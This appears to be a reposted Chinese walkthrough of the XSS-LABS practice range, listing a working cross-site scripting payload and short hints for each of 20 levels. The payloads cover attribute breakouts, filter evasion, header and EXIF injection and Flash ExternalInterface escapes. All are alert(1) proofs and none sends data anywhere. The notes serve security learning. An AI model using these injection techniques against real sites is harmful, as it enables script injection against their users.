本文主要是介绍XSS - LABS —— 靶场笔记合集,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
0x01:XSS LABS 靶场初识
- 0x01:XSS LABS 靶场初识
0x02:XSS LABS 过关思路
- 0x0201:XSS LABS - Level 1 过关思路
- Pass Payload:
<script>alert(1)</script>
- Pass Payload:
- 0x0202:XSS LABS - Level 2 过关思路
- Pass Payload:
"><script>alert(1)</script>
- Pass Payload:
- 0x0203:XSS LABS - Level 3 过关思路
- Pass Payload:
' onmousemove='alert(1)
- 备注:
htmlspecialchars()
函数在 PHP 8 中默认过滤掉单双引号,可能导致攻击无效。
- Pass Payload:
- 0x0204:XSS LABS - Level 4 过关思路
- Pass Payload:
" onmouseover="alert(1)
- Pass Payload:
- 0x0205:XSS LABS - Level 5 过关思路
- Pass Payload:
"><a href="javascript:alert(1)
- Pass Payload:
"><iframe src=javascript:alert(1); width="0px" height="0px"></iframe><input hidden style="text
- Pass Payload:
- 0x0206:XSS LABS - Level 6 过关思路
- Pass Payload:
"><ScRiPt>alert(1)</ScRiPt><input hidden value="
- Pass Payload:
- 0x0207:XSS LABS - Level 7 过关思路
- Pass Payload:
" oonnmouseover="alert(1)
- Pass Payload:
- 0x0208:XSS LABS - Level 8 过关思路
- Pass Payload:
javascript:alert(1)
- Pass Payload:
- 0x0209:XSS LABS - Level 9 过关思路
- Pass Payload:
javascript:alert('http://')
- Pass Payload:
- 0x0210:XSS LABS - Level 10 过关思路
- Pass Payload:
?t_sort=" onmousemove="alert(1)" type="
- Pass Payload:
- 0x0211:XSS LABS - Level 11 过关思路
- Pass Payload:
" type="text" onmouseover="alert(1)
- 备注:注入点在 HTTP 请求包的 Referer 字段上,找准注入参数很重要。
- Pass Payload:
- 0x0212:XSS LABS - Level 12 过关思路
- Pass Payload:
" type="text" onmouseover="alert(1)
- 备注:注入点在 HTTP 请求包的 User-Agent 字段上。
- Pass Payload:
- 0x0213:XSS LABS - Level 13 过关思路
- Pass Payload:
" type="text" onmouseover="alert(1)
- 备注:注入点在 HTTP 请求包的 Cookie 字段的 user 参数中。
- Pass Payload:
- 0x0214:XSS LABS - Level 14 过关思路
- Pass Payload:
<script>alert(1)</script>
- 备注:本关需要通过修改图片的 EXIF 信息完成 XSS 攻击。
- Pass Payload:
- 0x0215:XSS LABS - Level 15 过关思路
- Pass Payload:
<a href="" onmouseover="alert(1)">
- 备注:本关需要修改图片内容,将 Payload 携带进图片后,再通过 Angular JS 包含图片进行攻击。
- Pass Payload:
- 0x0216:XSS LABS - Level 16 过关思路
- Pass Payload:
<input%0atype="text"%0aonmouseover="alert(1)">
- 备注:在 HTML 中,什么东西与空格等价?
- Pass Payload:
- 0x0217:XSS LABS - Level 17 过关思路
- Pass Payload:
?arg01=%20onmouseover&arg02=alert(1)
- 备注:使用 Google 浏览器过关。
- Pass Payload:
- 0x0218:XSS LABS - Level 18 过关思路
- Pass Payload:
?arg01= onmouseover&arg02=alert(1)
- 备注:使用 Google 浏览器过关。
- Pass Payload:
- 0x0219:XSS LABS - Level 19 过关思路
- Pass Payload:
?arg01=version&arg02=<a href='javascript:alert(1)'>Test</a>
- 备注:本关考察了 Flash XSS,需要使用 JPEXS 对
.swf
文件进行逆向。
- Pass Payload:
- 0x0220:XSS LABS - Level 20 过关思路
- Pass Payload:
?arg01=id&arg02=id\"));} catch (e) {alert(1);}//%26width=123%26height=123
- 备注:本关考察了 Flash XSS 中的
ExternalInterface.call
函数,需要掌握该函数在 JS 中的实际运行方式。
- Pass Payload:
这篇关于XSS - LABS —— 靶场笔记合集的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!